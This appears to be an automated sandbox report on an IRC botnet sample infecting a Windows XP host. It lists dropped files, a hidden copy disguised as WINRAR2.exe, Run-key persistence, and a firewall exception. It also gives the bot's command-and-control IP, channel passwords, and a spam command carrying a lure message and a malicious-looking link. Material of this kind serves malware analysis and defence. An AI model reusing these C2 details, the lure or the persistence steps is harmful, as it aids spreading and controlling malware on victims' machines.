C:\WINDOWS\IMBOT.EXE.config
C:\WINDOWS\IMBOT.EXE
\\.\Ip
\\.\PIPE\EVENTLOG
\\.\PIPE\ROUTER
C:\WINDOWS\AppPatch\sysmain.sdb
C:\WINDOWS\AppPatch\systest.sdb
\Device\NamedPipe\ShimViewer
C:\WINDOWS\
C:\WINDOWS\WINRAR2.exe.config
C:\WINDOWS\WINRAR2.exe
\\.\Ip
\\.\PIPE\EVENTLOG
\\.\PIPE\ROUTER
C:\WINDOWS\WINRAR2.exe
Deleted Files C:\WINDOWS\CIMBOT.EXE
Chronological Order Get File Attributes: C:\WINDOWS\Registration Flags: (SECURITY_ANONYMOUS)
Open File: C:\WINDOWS\Registration\R000000000007.clb (OPEN_EXISTING)
Open File: C:\WINDOWS\system32\de-DE\wshom.ocx.mui (OPEN_EXISTING)
Open File: C:\WINDOWS\system32\wshom.ocx (OPEN_EXISTING)
Open File: C:\WINDOWS\system32\stdole2.tlb (OPEN_EXISTING)
Create/Open File: c:\images000123jpg.exe (OPEN_ALWAYS)
Get File Attributes: C:\WINDOWS\system32\.HLP Flags: (SECURITY_ANONYMOUS)
Get File Attributes: C:\WINDOWS\Help\.HLP Flags: (SECURITY_ANONYMOUS)
Create File: C:\WINDOWS\CIMBOT.EXE
Open File: C:\WINDOWS\CIMBOT.EXE (OPEN_EXISTING)
Create File: C:\WINDOWS\IMBOT.EXE
Delete File: C:\WINDOWS\CIMBOT.EXE
Open File: \\.\PIPE\wkssvc (OPEN_EXISTING)
Get File Attributes: c:\ Flags: (SECURITY_ANONYMOUS)
Get File Attributes: C:\WINDOWS\IMBOT.EXE Flags: (SECURITY_ANONYMOUS)
Get File Attributes: C:\WINDOWS\ Flags: (SECURITY_ANONYMOUS)
Open File: \\.\PIPE\lsarpc (OPEN_EXISTING)
Get File Attributes: C:\Dokumente und Einstellungen\Administrator\Eigene Dateien\desktop.ini Flags: (SECURITY_ANONYMOUS)
Get File Attributes: C:\Dokumente und Einstellungen\All Users\Dokumente\desktop.ini Flags: (SECURITY_ANONYMOUS)
Open File: C:\Programme\Windows Desktop Search\MSNLNamespaceMgr.dll (OPEN_EXISTING)
Get File Attributes: C:\WINDOWS\Registration Flags: (SECURITY_ANONYMOUS)
Open File: C:\WINDOWS\Registration\R000000000007.clb (OPEN_EXISTING)
Get File Attributes: C:\WINDOWS\IMBOT.EXE:Zone.Identifier Flags: (SECURITY_ANONYMOUS)
Open File: C:\WINDOWS\AppPatch\sysmain.sdb (OPEN_EXISTING)
Open File: C:\WINDOWS\AppPatch\systest.sdb (OPEN_EXISTING)
Open File: \Device\NamedPipe\ShimViewer (OPEN_EXISTING)
Open File: C:\WINDOWS\ ()
Find File: C:\WINDOWS\IMBOT.EXE
Get File Attributes: C:\WINDOWS\system32\mscoree.dll.local Flags: (SECURITY_ANONYMOUS)
Open File: C:\WINDOWS\IMBOT.EXE.config (OPEN_EXISTING)
Open File: C:\WINDOWS\IMBOT.EXE (OPEN_EXISTING)
Get File Attributes: C:\WINDOWS\Microsoft.NET\Framework\v2.0.50727 Flags: (SECURITY_ANONYMOUS)
Find File: C:\WINDOWS\Microsoft.NET\Framework\v2.0.50727\mscorwks.dll
Create/Open File: \Device\Tcp (OPEN_ALWAYS)
Create/Open File: \Device\Ip (OPEN_ALWAYS)
Create/Open File: \Device\Ip (OPEN_ALWAYS)
Open File: \\.\Ip (OPEN_EXISTING)
Create/Open File: \Device\Gpc (OPEN_ALWAYS)
Create/Open File: \Device\Tcp6 (OPEN_ALWAYS)
Open File: \\.\PIPE\EVENTLOG (OPEN_EXISTING)
Open File: \\.\PIPE\ROUTER (OPEN_EXISTING)
Get File Attributes: C:\WINDOWS\WINRAR2.exe Flags: (SECURITY_ANONYMOUS)
Copy File: C:\WINDOWS\IMBOT.EXE to C:\WINDOWS\WINRAR2.exe
Set File Attributes: C:\WINDOWS\WINRAR2.exe Flags: (FILE_ATTRIBUTE_HIDDEN FILE_ATTRIBUTE_READONLY FILE_ATTRIBUTE_SYSTEM SECURITY_ANONYMOUS)
Open File: C:\WINDOWS\AppPatch\sysmain.sdb (OPEN_EXISTING)
Open File: C:\WINDOWS\AppPatch\systest.sdb (OPEN_EXISTING)
Open File: \Device\NamedPipe\ShimViewer (OPEN_EXISTING)
Open File: C:\WINDOWS\ ()
Find File: C:\WINDOWS\WINRAR2.exe
Get File Attributes: C:\WINDOWS\system32\mscoree.dll.local Flags: (SECURITY_ANONYMOUS)
Open File: C:\WINDOWS\WINRAR2.exe.config (OPEN_EXISTING)
Open File: C:\WINDOWS\WINRAR2.exe (OPEN_EXISTING)
Get File Attributes: C:\WINDOWS\Microsoft.NET\Framework\v2.0.50727 Flags: (SECURITY_ANONYMOUS)
Find File: C:\WINDOWS\Microsoft.NET\Framework\v2.0.50727\mscorwks.dll
Create/Open File: \Device\Tcp (OPEN_ALWAYS)
Create/Open File: \Device\Ip (OPEN_ALWAYS)
Create/Open File: \Device\Ip (OPEN_ALWAYS)
Open File: \\.\Ip (OPEN_EXISTING)
Create/Open File: \Device\Gpc (OPEN_ALWAYS)
Create/Open File: \Device\Tcp6 (OPEN_ALWAYS)
Open File: \\.\PIPE\EVENTLOG (OPEN_EXISTING)
Open File: \\.\PIPE\ROUTER (OPEN_EXISTING)
Create/Open File: \Device\RasAcd (OPEN_ALWAYS)
Open File: C:\WINDOWS\WINRAR2.exe (OPEN_EXISTING)
* C&C Server: 93.190.138.202:6667
* Server Password:
* Username: ryatoaj
* Nickname: [DEU|XP|516568]
* Channel: #!x!# (Password: cih4n1313)
* Channeltopic: :
* C&C Server: 93.190.138.202:6667
* Server Password:
* Username: XP-4392
* Nickname: [00|DEU|636610]
* Channel: #x# (Password: hacimackackac)
* Channeltopic: :.msn.stop|.msn.msg þu resme bi bakarmýsýn (yemekteyim) http://www.facebookbul.co.cc/images.php?=resim166-jpeg?=
* C&C Server: 93.190.138.202:6667
* Server Password:
* Username: aLeyna_yarak-istiyor
* Nickname: sevgi
* Channel: #X (Password: s1k1k)
* Channeltopic: :FFF
Registry Changes by all processes
Create or Open
Changes HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run "Windows Services" = WINRAR2.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Terminal Server\Install\Software\Microsoft\Windows\CurrentVersion\Run "Windows Services" = WINRAR2.exe
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List "C:\WINDOWS\IMBOT.EXE" = C:\WINDOWS\IMBOT.EXE:*:Enabled:Windows Services
Reads HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CTF\SystemShared "CUAS"
HKEY_CURRENT_USER\Keyboard Layout\Toggle "Language Hotkey"
HKEY_CURRENT_USER\Keyboard Layout\Toggle "Layout Hotkey"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CTF "EnableAnchorContext"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\IMM "Ime File"
HKEY_CURRENT_USER\Software\Microsoft\CTF "Disable Thread Input Manager"
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\TypeLib\{F935DC20-1CF0-11D0-ADB9-00C04FD58A0B}\1.0\0 "win32"
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\TypeLib\{00020430-0000-0000-C000-000000000046}\2.0\0 "win32"
HKEY_CURRENT_USER\Software\Microsoft\Visual Basic\6.0 "AllowUnsafeObjectPassing"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography "MachineGuid"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CTF\SystemShared "CUAS"
HKEY_CURRENT_USER\Keyboard Layout\Toggle "Language Hotkey"
HKEY_CURRENT_USER\Keyboard Layout\Toggle "Layout Hotkey"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CTF "EnableAnchorContext"
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Session Manager\AppCompatibility "DisableAppCompat"
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{56F9679E-7826-4C84-81F3-532071A8BCC5}\InprocServer32 ""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Search\ProtocolHandlers\File\0 "ProgID"
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\file "ShellFolder"
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Mapi "ShellFolder"
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Outlookexpress "ShellFolder"
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\OTFS "ShellFolder"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Default ""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Default "ContentType"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Default "TemplateUrl"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Default "ScriptOk"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.bmp ""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.bmp "ContentType"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.bmp "TemplateUrl"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.bmp "ScriptOk"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.c ""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.c "ContentType"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.c "TemplateUrl"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.c "ScriptOk"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.cpp ""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.cpp "ContentType"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.cpp "TemplateUrl"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.cpp "ScriptOk"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.cs ""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.cs "ContentType"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.cs "TemplateUrl"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.cs "ScriptOk"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.cxx ""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.cxx "ContentType"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.cxx "TemplateUrl"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.cxx "ScriptOk"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.doc ""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.doc "ContentType"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.doc "TemplateUrl"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.doc "ScriptOk"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.dot ""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.dot "ContentType"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.dot "TemplateUrl"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.dot "ScriptOk"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.emf ""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.emf "ContentType"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.emf "TemplateUrl"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.emf "ScriptOk"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.eml ""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.eml "ContentType"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.eml "TemplateUrl"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.eml "ScriptOk"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.err ""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.err "ContentType"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.err "TemplateUrl"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.err "ScriptOk"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.gif ""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.gif "ContentType"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.gif "TemplateUrl"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.gif "ScriptOk"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.h ""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.h "ContentType"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.h "TemplateUrl"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.h "ScriptOk"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.htm ""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.htm "ContentType"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.htm "TemplateUrl"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.htm "ScriptOk"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.html ""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.html "ContentType"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.html "TemplateUrl"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.html "ScriptOk"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.hxx ""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.hxx "ContentType"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.hxx "TemplateUrl"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.hxx "ScriptOk"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.idl ""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.idl "ContentType"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.idl "TemplateUrl"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.idl "ScriptOk"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.jpeg ""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.jpeg "ContentType"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.jpeg "TemplateUrl"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.jpeg "ScriptOk"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.jpg ""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.jpg "ContentType"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.jpg "TemplateUrl"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.jpg "ScriptOk"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.jsl ""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.jsl "ContentType"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.jsl "TemplateUrl"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.jsl "ScriptOk"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.mht ""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.mht "ContentType"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.mht "TemplateUrl"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.mht "ScriptOk"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.mhtml ""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.mhtml "ContentType"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.mhtml "TemplateUrl"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.mhtml "ScriptOk"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.nws ""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.nws "ContentType"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.nws "TemplateUrl"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.nws "ScriptOk"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.pdf ""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.pdf "ContentType"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.pdf "TemplateUrl"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.pdf "ScriptOk"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.png ""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.png "ContentType"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.png "TemplateUrl"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.png "ScriptOk"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.pot ""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.pot "ContentType"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.pot "TemplateUrl"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.pot "ScriptOk"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.pps ""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.pps "ContentType"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.pps "TemplateUrl"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.pps "ScriptOk"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.ppt ""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.ppt "ContentType"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.ppt "TemplateUrl"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.ppt "ScriptOk"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.rtf ""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.rtf "ContentType"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.rtf "TemplateUrl"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.rtf "ScriptOk"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.txt ""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.txt "ContentType"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.txt "TemplateUrl"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.txt "ScriptOk"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.vb ""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.vb "ContentType"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.vb "TemplateUrl"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.vb "ScriptOk"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.wmf ""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.wmf "ContentType"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.wmf "TemplateUrl"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.wmf "ScriptOk"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.wrn ""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.wrn "ContentType"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.wrn "TemplateUrl"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.wrn "ScriptOk"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.xls ""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.xls "ContentType"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.xls "TemplateUrl"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.xls "ScriptOk"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.xlt ""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.xlt "ContentType"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.xlt "TemplateUrl"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.xlt "ScriptOk"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.xml ""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.xml "ContentType"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.xml "TemplateUrl"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.xml "ScriptOk"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.xsd ""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.xsd "ContentType"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.xsd "TemplateUrl"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.xsd "ScriptOk"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\calendar ""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\calendar "ContentType"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\calendar "TemplateUrl"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\calendar "ScriptOk"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\communications ""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\communications "ContentType"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\communications "TemplateUrl"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\communications "ScriptOk"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\contact ""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\contact "ContentType"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\contact "TemplateUrl"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\contact "ScriptOk"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\document ""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\document "ContentType"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\document "TemplateUrl"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\document "ScriptOk"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\email ""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\email "ContentType"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\email "TemplateUrl"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\email "ScriptOk"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\favorite ""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\favorite "ContentType"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\favorite "TemplateUrl"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\favorite "ScriptOk"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\folder ""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\folder "ContentType"
